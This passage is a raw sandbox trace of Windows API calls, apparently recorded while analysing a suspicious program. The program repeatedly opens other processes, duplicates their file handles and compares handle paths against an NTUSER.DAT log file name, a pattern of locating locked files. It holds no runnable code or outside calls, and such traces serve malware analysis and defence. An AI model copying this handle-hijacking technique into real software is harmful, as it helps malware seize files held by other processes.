WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.325] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.325] CloseHandle (hObject=0x1e4) returned 1 [0163.325] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.325] CloseHandle (hObject=0x194) returned 1 [0163.325] CloseHandle (hObject=0x1e8) returned 1 [0163.325] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7bc) returned 0x1e8 [0163.325] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.326] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.326] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.327] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.327] CloseHandle (hObject=0x1e4) returned 1 [0163.327] _wcsicmp (_Str1="\\Windows NT", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.327] CloseHandle (hObject=0x194) returned 1 [0163.327] CloseHandle (hObject=0x1e8) returned 1 [0163.327] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x490) returned 0x1e8 [0163.327] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.327] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.329] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.330] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.330] CloseHandle (hObject=0x1e4) returned 1 [0163.330] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.330] CloseHandle (hObject=0x194) returned 1 [0163.330] CloseHandle (hObject=0x1e8) returned 1 [0163.330] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x490) returned 0x1e8 [0163.330] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.330] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.331] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.332] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.332] CloseHandle (hObject=0x1e4) returned 1 [0163.332] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 7 [0163.332] CloseHandle (hObject=0x194) returned 1 [0163.332] CloseHandle (hObject=0x1e8) returned 1 [0163.332] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6dc) returned 0x1e8 [0163.332] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.332] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.333] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.333] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.333] CloseHandle (hObject=0x1e4) returned 1 [0163.333] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.334] CloseHandle (hObject=0x194) returned 1 [0163.334] CloseHandle (hObject=0x1e8) returned 1 [0163.334] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6dc) returned 0x1e8 [0163.334] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.334] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.334] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.335] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.335] CloseHandle (hObject=0x1e4) returned 1 [0163.335] _wcsicmp (_Str1="\\Windows Media Player", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.335] CloseHandle (hObject=0x194) returned 1 [0163.335] CloseHandle (hObject=0x1e8) returned 1 [0163.335] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x734) returned 0x1e8 [0163.336] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.336] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.336] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.337] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.337] CloseHandle (hObject=0x1e4) returned 1 [0163.337] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.337] CloseHandle (hObject=0x194) returned 1 [0163.337] CloseHandle (hObject=0x1e8) returned 1 [0163.337] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x734) returned 0x1e8 [0163.337] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.337] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.338] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.339] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.339] CloseHandle (hObject=0x1e4) returned 1 [0163.339] _wcsicmp (_Str1="\\Microsoft Visual Studio 8", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.339] CloseHandle (hObject=0x194) returned 1 [0163.339] CloseHandle (hObject=0x1e8) returned 1 [0163.339] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7e4) returned 0x1e8 [0163.340] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.340] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.340] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.341] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.341] CloseHandle (hObject=0x1e4) returned 1 [0163.341] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.341] CloseHandle (hObject=0x194) returned 1 [0163.341] CloseHandle (hObject=0x1e8) returned 1 [0163.342] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7e4) returned 0x1e8 [0163.342] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.342] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.342] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.344] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.344] CloseHandle (hObject=0x1e4) returned 1 [0163.344] _wcsicmp (_Str1="\\Windows NT", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.344] CloseHandle (hObject=0x194) returned 1 [0163.344] CloseHandle (hObject=0x1e8) returned 1 [0163.344] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x488) returned 0x1e8 [0163.344] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.344] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.345] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.346] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.346] CloseHandle (hObject=0x1e4) returned 1 [0163.346] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.346] CloseHandle (hObject=0x194) returned 1 [0163.346] CloseHandle (hObject=0x1e8) returned 1 [0163.346] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x488) returned 0x1e8 [0163.346] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.346] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.347] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.348] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.348] CloseHandle (hObject=0x1e4) returned 1 [0163.348] _wcsicmp (_Str1="\\MSBuild", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.348] CloseHandle (hObject=0x194) returned 1 [0163.348] CloseHandle (hObject=0x1e8) returned 1 [0163.348] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x730) returned 0x1e8 [0163.348] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.348] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.350] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.351] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.351] CloseHandle (hObject=0x1e4) returned 1 [0163.351] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.351] CloseHandle (hObject=0x194) returned 1 [0163.352] CloseHandle (hObject=0x1e8) returned 1 [0163.352] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x730) returned 0x1e8 [0163.352] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.352] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.353] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.353] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.356] CloseHandle (hObject=0x1e4) returned 1 [0163.356] _wcsicmp (_Str1="\\MSBuild", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.356] CloseHandle (hObject=0x194) returned 1 [0163.356] CloseHandle (hObject=0x1e8) returned 1 [0163.356] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x414) returned 0x1e8 [0163.356] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.356] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.357] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.358] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.358] CloseHandle (hObject=0x1e4) returned 1 [0163.358] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.358] CloseHandle (hObject=0x194) returned 1 [0163.358] CloseHandle (hObject=0x1e8) returned 1 [0163.358] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x414) returned 0x1e8 [0163.358] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.359] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.360] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.360] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.361] CloseHandle (hObject=0x1e4) returned 1 [0163.361] _wcsicmp (_Str1="\\Windows Portable Devices", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.361] CloseHandle (hObject=0x194) returned 1 [0163.361] CloseHandle (hObject=0x1e8) returned 1 [0163.361] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x620) returned 0x1e8 [0163.361] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.361] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.362] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.362] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.363] CloseHandle (hObject=0x1e4) returned 1 [0163.363] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.363] CloseHandle (hObject=0x194) returned 1 [0163.363] CloseHandle (hObject=0x1e8) returned 1 [0163.363] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x620) returned 0x1e8 [0163.363] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.363] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.364] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.365] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.365] CloseHandle (hObject=0x1e4) returned 1 [0163.365] _wcsicmp (_Str1="\\MSBuild", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.365] CloseHandle (hObject=0x194) returned 1 [0163.365] CloseHandle (hObject=0x1e8) returned 1 [0163.365] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x738) returned 0x1e8 [0163.365] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.365] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.366] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.369] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.369] CloseHandle (hObject=0x1e4) returned 1 [0163.369] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.369] CloseHandle (hObject=0x194) returned 1 [0163.369] CloseHandle (hObject=0x1e8) returned 1 [0163.369] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x738) returned 0x1e8 [0163.370] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.370] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.370] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.371] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.371] CloseHandle (hObject=0x1e4) returned 1 [0163.371] _wcsicmp (_Str1="\\Microsoft Sync Framework", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.371] CloseHandle (hObject=0x194) returned 1 [0163.372] CloseHandle (hObject=0x1e8) returned 1 [0163.372] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x820) returned 0x1e8 [0163.372] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.372] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.372] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.373] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.374] CloseHandle (hObject=0x1e4) returned 1 [0163.374] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.374] CloseHandle (hObject=0x194) returned 1 [0163.374] CloseHandle (hObject=0x1e8) returned 1 [0163.374] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x820) returned 0x1e8 [0163.374] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.374] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.375] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.375] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.376] CloseHandle (hObject=0x1e4) returned 1 [0163.376] _wcsicmp (_Str1="\\Mozilla Maintenance Service", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.376] CloseHandle (hObject=0x194) returned 1 [0163.376] CloseHandle (hObject=0x1e8) returned 1 [0163.376] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x840) returned 0x1e8 [0163.376] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.376] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.376] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.377] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.377] CloseHandle (hObject=0x1e4) returned 1 [0163.377] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.377] CloseHandle (hObject=0x194) returned 1 [0163.377] CloseHandle (hObject=0x1e8) returned 1 [0163.378] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x840) returned 0x1e8 [0163.378] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.378] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.378] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.379] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.379] CloseHandle (hObject=0x1e4) returned 1 [0163.379] _wcsicmp (_Str1="\\Microsoft Synchronization Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.379] CloseHandle (hObject=0x194) returned 1 [0163.380] CloseHandle (hObject=0x1e8) returned 1 [0163.380] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x850) returned 0x1e8 [0163.380] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.380] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.381] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.381] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.382] CloseHandle (hObject=0x1e4) returned 1 [0163.382] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.382] CloseHandle (hObject=0x194) returned 1 [0163.382] CloseHandle (hObject=0x1e8) returned 1 [0163.382] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x850) returned 0x1e8 [0163.382] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.382] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.383] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.384] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.384] CloseHandle (hObject=0x1e4) returned 1 [0163.384] _wcsicmp (_Str1="\\Microsoft Sync 